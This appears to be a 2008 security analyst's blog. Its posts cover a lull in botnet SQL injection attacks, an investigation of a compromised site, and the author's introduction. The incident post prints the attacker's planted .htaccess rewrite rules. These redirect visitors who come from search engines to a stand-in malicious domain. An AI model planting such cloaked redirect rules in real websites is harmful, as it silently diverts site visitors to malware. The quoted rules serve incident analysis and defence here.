Where Have all the Bad Guys Gone???

So I am finally fed up with it. Where have all the bad guys gone. I would like to reach out to all of you and let you know that I am starting to run out of side projects.

Since the beginning of 2008 I have seen a huge increase in Automated Blind SQL injection Attacks on websites. I was watching all of these attacks evolve (More on this to come later) into more and more crafty SQL statements attempting to inject a malicious .js file into the SQL database. From what I have been reading up on, Researchers have all agreed that botnets have been increasing almost exponentially over the last few months and are a huge contribution to these SQL injection attacks. Not only was a large part of my day taken up by testing and consulting on all previous compromises, but also in researching and evolving my Pen testing skills to be able to grow in workload to handle these increase in attacks.

Then August came. All of a sudden these attacks have almost come to a halt. My workload has decreased by at least 75% in automated compromises with no apparent warning. From a Security Conference I attended in September, I was informed that a few of the worlds largest botnets have suspended operations to overhaul their entire structure making them more efficient and more powerful. This has been a direct cause for the decrease in automated sql injection attacks, but will resume when activity picks back up within the botnets.

It has been a couple of months now since I have seen the decrease in successful automated SQL injection attacks. If you would have asked me, I would surly would have guessed that things would be "better than ever" in the botnet community by now, but I have not seen it in the end result.

I am waiting patiently for things to be back up to normal and like always would love any ideas/news/opinions on when this is going to happen.

Search Engine 302 Redirect in .htaccess file.

A couple months ago I was working with a customer who whenever you attempt to go to their website via google or yahoo, you were redirected to this famous Anti-virusxp 2008 software. After playing around a bit in my proxy, I was able to determine that this was a "Referrer" specific problem. If you traveled to the website via address bar, you were fine, however if your referrer attribute was set to a major search engine domain such at google, aol, ask, or yahoo, you were automatically redirected to a malicious page.

After alerting the customer of this issue, I asked him if he could please keep me informed of what was causing this. I contacted him two days later only to hear that his hosting company has taken care of the issue and he has zero details for me regarding the compromise.

For some reason, I really liked this type of compromise. For the most part the website owner could be completely uneducated that this is occurring for months. This to me, is a compromise that does not take full advantage, but somewhat leeches off of you like a tape worm.

I wanted to see this issue again. So what I did was plug this into our product to attempt to detect any site that was currently redirecting only if the referrer a site like google or yahoo. A month went by before I was able to see this again.

I was able to pick up on another Search Engine 302 redirect issue on the day that it was exploited. Our product detected and and i verified that it was valid. I was able to contact the customer and provide him with details about the issue and he was willing to work with me on determining how this was occurring.

Although I did not believe that this was occurring via SQL injection or via any GET/POST request, I still requested the entire week of log files. In reviewing these log files, I did see a couple of RFI attempts but nothing that looked successful or from review of the .txt page that the RFI was calling, I did not see anything that would lead to a compromise.

I was able to track down the problem and saw that the .htaccess file was replaced and contained the following.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://maliciousdomain.com [R,L]


So with the review on the website, I am starting to point myself in the direction that there is an issue with the file permissions on the webserver.


This site was hosted through a large Hosting Provider in which I have already had previous issues with.

I had a Compromised Account come to me with an IFrame embedded on their website and all of the images deleted from the webserver. When looking up the iframe on google. I saw 20 different domains with the same iframe all hosted by by the same hosting provider. We came to the conclusion that there was probably some serious permission issues on the webserver. I had the customer move to a different hosting environment and they have not experienced a compromise since. I am guessing that this site might be experiencing the same type of problem.


If you have any more information to this issue, I would love to know about it. I really enjoy working with these types of compromise because they are few and far between and to me, seem well though out in design.

An Introduction

So I have decided to start working on SEO for my life. I know this sounds a little dumb, but everyone is doing it, and well, I need to capitalize on it also.

My name is James A Lester and I am a Security Analyst for McAfee's Mcafee Secure Product.
My Current Position At McAfee is a Senior Level Analyst. The majority of my Position is to review Compromised Websites, determining how the compromised occurred and verifying that the website is further secured from the compromise occuring in the future.

I really enjoy my positon as I feel that I am on the frontlines of Web Application Security. I feel that I am viewing 0day information in SQL injection, CSRF, XSS, RFI/LFI, ect ect.

What I am hoping to get out of this blog, is to post any information that I am currently seeing coming down the pipe in the Security World, and see if anyone else is has anything to provide in the discussion.

I will try to remember to update this blog (keyword try, I dont think i have updated my resume since High School except for adding jobs) with anything that I am working on in the world of security or anything that I feel like.